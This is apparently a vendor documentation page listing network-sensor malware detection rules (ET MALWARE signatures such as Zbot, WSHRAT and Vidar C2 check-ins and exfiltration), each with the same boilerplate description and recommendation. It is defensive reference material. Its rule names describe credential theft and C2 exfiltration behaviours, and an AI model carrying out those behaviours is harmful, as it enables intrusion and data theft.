ET MALWARE Win32/Vermilion Stager Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vflooder.C Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vidar Variant/Mars Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Vilsel Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Virut.BN Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.Virut - GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/ViSystem CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Checkin Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer CnC Activity (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Download Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Voltron/Spectre Stealer Sending OS Information (POST)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vools Variant CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Vundo.OD Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Webdor.NAC Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Winshow User Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/X-Files Stealer Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Xtrat.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ymacco.AA1C Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Ymacco.AA67 CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.YordanyanActiveAgent CnC Reporting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32.YordanyanActiveAgent Generic CnC Pattern

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zacom.A CnC Beacon 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Win32.Zbot.ivgw Downloading EXE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Config Download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Requesting PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot Requesting PE

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zemot URI Struct

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win32/Zeprox.B Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Agent.NL Variant CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Havex Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/TrojanDownloader.Age Download Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win64/Vabushky.A Malicious driver download

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV check-in GET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV get_product_domains.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WindowsEnterpriseSuite FakeAV Reporting via POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Windows Executable Downloaded With Image Content-Type Header

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Windows Executable Sent When Remote Host Claims to Send a RAR Archive

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Winsoft.E Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity (GET) M3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M2 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M4 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Activity M5 (GET)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Retrieving Commands

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wintervivern Retrieving Task

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Win.Trojan.Chewbacca connectivity check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Wonton-JH Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC CreateFolderOnServer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC DeleteFileOnServer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WooSIP Downloader CnC WriteMetadataOnServer

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-cmd-shell)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-driver)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-folder)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.ayr CnC command (is-enum-process)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm Checkin UA

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.VBS.Jenxcus.H User Agent

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Checkin 1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Checkin Generic

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WORM_VOBFUS Requesting exe

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.Win32.Balucaf.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Worm.Win32.Vobfus Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WRAT Dropper (TLS SNI)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSF/JS Downloader Jan 30 2017 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT Credential Dump Module Download Command Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WSHRAT Keylogger Module Download Command Inbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WS/JS Downloader Mar 07 2017 M1

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE WS/JS Downloader Mar 07 2017 M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X2000M.Agent Checkin Jan 24 2017

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xbagger Macro Encrypted DL

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xbagger Macro Encrypted DL Jun 13 2016

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE xCaon Embedded Encrypted Command in Webpage

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XcodeGhost CnC Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XcodeGhost CnC M2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDMonitor Checkin Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDMonitor Sending Debug Messages

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Sending File Upload Progress

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Sending Screenshot Upload Progress

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Uploading Directory Listting

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XDUpload Uploading Files

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X-Files Stealer CnC Exfil Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XLS.Unk DDE rar Drop Attempt (.club)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XLS.Unk DDE rar Drop Attempt (.online)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE X-Malware-Sinkhole Header in HTTP Response

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE xpsecuritycenter.com Fake AntiVirus GET-Install Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE XPSecurityCenter FakeAV Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Xwo CnC Activity

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE YAHOOYLO Stealer CnC Exfil

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yahoyah CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Yandexbot Request Outbound

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Search Open Websites/Domains - T1593

ET MALWARE Yayih.A Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yayih.A Checkin 2

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Yayih.A Checkin 3

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE ZAccess/Sirefef/MAX++/Jorik/Smadow Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog Checkin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog HTTP POST Connectivity Check

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zacom/NFlog HTTP POST Fake UA CnC Beacon

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques
Copy link

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Zalupko/Koceg/Mandaph HTTP Checkin (2)

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zberp receiving config via image file - SET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot/Beomok/PSW - HTTP POST

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC GET /lost.dat

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC POST /common/timestamps.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot CnC POST /common/versions.php

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot download config

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot download config - SET

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot Generic URI/Header Struct .bin

Description
Copy link

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation
Copy link

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Zbot .onion Proxy domain in SNI Aug 04 2014

Description
Copy link

Recommendation
Copy link

